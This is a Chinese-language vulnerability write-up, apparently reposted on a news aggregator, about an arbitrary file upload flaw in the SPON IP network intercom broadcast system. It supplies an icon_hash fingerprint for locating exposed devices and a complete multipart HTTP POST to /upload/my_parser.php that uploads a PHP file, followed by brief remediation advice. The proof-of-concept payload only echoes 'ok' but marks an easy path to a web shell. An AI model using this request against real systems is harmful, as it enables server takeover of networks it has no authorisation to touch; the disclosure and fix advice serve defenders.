当前位置: 首页 > news >正文

世邦spon IP网络对讲广播系统任意文件上传漏洞

news 2025/7/18 5:12:19

产品介绍

世邦通信IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash=“-1830859634”
在这里插入图片描述

漏洞复现

POST /upload/my_parser.php HTTP/1.1
Host: your_ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 200------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="upload"; filename="7788.php"
Content-Type: image/jpeg<?php echo 'ok';?>
------WebKitFormBoundary9PggsiM755PLa54a--

在这里插入图片描述
访问上传的文件
在这里插入图片描述

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

http://www.lryc.cn/news/281507.html

相关文章:

  • mp4文件全部转换为mp3
  • 深信服技术认证“SCSA-S”划重点:逻辑漏洞
  • Linux grep命令教程:强大的文本搜索工具(附案例详解和注意事项)
  • 网络安全的威胁PPT
  • CUDA驱动深度学习发展 - 技术全解与实战
  • 如何做用户分层和标签体系
  • Vue+Element Ui实现el-table自定义表头下拉选择表头筛选
  • 使用Java连接MongoDB (6.0.12) 报错
  • 数学建模day16-预测模型
  • Vue3响应式系统(一)
  • MStart | MStart开发与学习
  • GoZero微服务个人探索之路(一)Etcd:context deadline exceeded原因探究及解决
  • C语言从入门到实战——结构体与位段
  • java如何修改windows计算机本地日期和时间?
  • flink中的row类型详解
  • 漏洞复现-Yearning front 任意文件读取漏洞(附漏洞检测脚本)
  • K8S中SC、PV、PVC的理解
  • Agisoft Metashape 基于影像的外部点云着色
  • 图解结算平台:准确高效给商户结款
  • 修改和调试 onnx 模型
  • 不同整数的最少数目和单词直接最短距离
  • 【Microsoft Edge】版本 109.0.1518.55 (正式版本) (64 位) 更新失败解决方案
  • 深度学习笔记(四)——使用TF2构建基础网络的常用函数+简单ML分类实现
  • 大模型学习篇(一):初识大模型
  • uni-app的学习【第二节】
  • matlab行操作快?还是列操作快?
  • 基于SSM的流浪动物救助站
  • 任务13:使用MapReduce对天气数据进行ETL(获取各基站ID)
  • @Controller层自定义注解拦截request请求校验
  • Ceph集群修改主机名